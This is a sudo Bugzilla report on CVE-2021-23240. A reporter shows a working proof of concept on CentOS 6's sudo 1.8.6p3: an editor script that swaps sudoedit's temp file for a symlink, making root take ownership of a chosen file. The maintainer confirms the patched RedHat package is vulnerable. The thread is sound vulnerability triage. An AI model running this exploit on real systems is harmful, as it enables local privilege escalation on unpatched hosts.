Bugzilla – Bug 979
PoC for CVE-2021-23240 also work on sudo-1.8.6
Last modified: 2021-06-17 09:38:30 MDT
First of all, in CVE DB (https://cve.circl.lu/cve/CVE-2021-23240) affected sudo versions start from 1.3.0. But, in sudo site affected versions starts from 1.8.11. So, i try to check, is version sudo-1.8.6 (OS CentOS 6) is affected by PoC. And it is affected, at least PoC working. From PoC description # echo 0 > /proc/sys/fs/protected_symlinks -bash: /proc/sys/fs/protected_symlinks: No such file or directory # cat /etc/sudoers testuser ALL=(root) sudoedit /etc/somefile ... $ cat > myeditor <<'EOF' > #!/bin/sh > echo replacing $1 > rm $1 > ln -s /home/testuser/targetfile $1 > exit 0 > EOF $ chmod 755 myeditor $ touch /home/testuser/targetfile $ ls -l /home/testuser/targetfile -rw-rw-r--. 1 testuser testuser 0 Jun 17 07:38 /home/testuser/targetfile $ EDITOR=`pwd`/myeditor sudoedit -r unconfined_r -t unconfined_t /etc/somefile [sudo] password for testuser: replacing /var/tmp/sudo.Uxthl3 $ ll /home/testuser/targetfile -rw-rw-r--. 1 root root 0 Jun 17 07:38 /home/testuser/targetfile $ cat /etc/*release CentOS release 6.10 (Final, ELS by Cloudlinux) $ rpm -qa | grep sudo sudo-1.8.6p3-29.el6_10.3.x86_64 So, i think, this mean, that affected versions starts earler, than 1.8.11 or PoC not correct.
I try to search chown() in strace ouput, and found it: # strace -o strace.out -E EDITOR=/home/testuser/myeditor sudoedit -u testuser -p 12345678 -r unconfined_r -t unconfined_t /etc/somefile replacing /var/tmp/sudo.jSDgvV (I don't know how run strace and sudoedit from user session, i got a message 'sudoedit: effective uid is not 0, is sudo installed setuid root?') strace.out add to attachments
Created attachment 557 [details] strace.out
I'm sorry but that is not a valid test. The sudo package shipped by RedHat (and CentOS) has thousands of lines of changes backported from newer versions of sudo. The stock version of sudo 1.8.6p3 does not have the bug because the code in question simply does not exist there. I just verified this on CentOS 6 by compiling my own sudo 1.8.6p3 package from stock sources: [testuser@rh6 ~]$ id uid=501(testuser) gid=501(testuser) groups=501(testuser) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023 [testuser@rh6 ~]$ cat myeditor #!/bin/sh echo replacing $1 rm $1 ln -s /home/testuser/targetfile $1 exit 0 [testuser@rh6 ~]$ ls -l /home/testuser/targetfile -rw-r--r--. 1 testuser testuser 0 Jun 17 08:57 /home/testuser/targetfile [testuser@rh6 ~]$ EDITOR=`pwd`/myeditor sudoedit -r unconfined_r -t unconfined_t /etc/somefile sudoedit: unable to execute sudoedit: Permission denied sudoedit: /etc/somefile unchanged
I just confirmed that CVE-2021-23240 is present in the RedHat sudo 1.8.6p3 package. Unfortunately, I can't support old versions of sudo that have large patch sets (which may introduce bugs not present in mainline sudo). I'll add a note to https://www.sudo.ws/alerts/sudoedit_selinux.html that vendor packages may include patches that cause older sudo packages to be vulnerable.
It appears that RedHat only fixed the bug in RHEL 8. https://access.redhat.com/security/cve/cve-2021-23240 I'm closing this bug as it is specific to the RedHat frankenbuild of sudo and they do not seem to be interested in fixing it for older versions of RHEL. You can always find builds of the latest version of sudo at https://www.sudo.ws/download.html#binary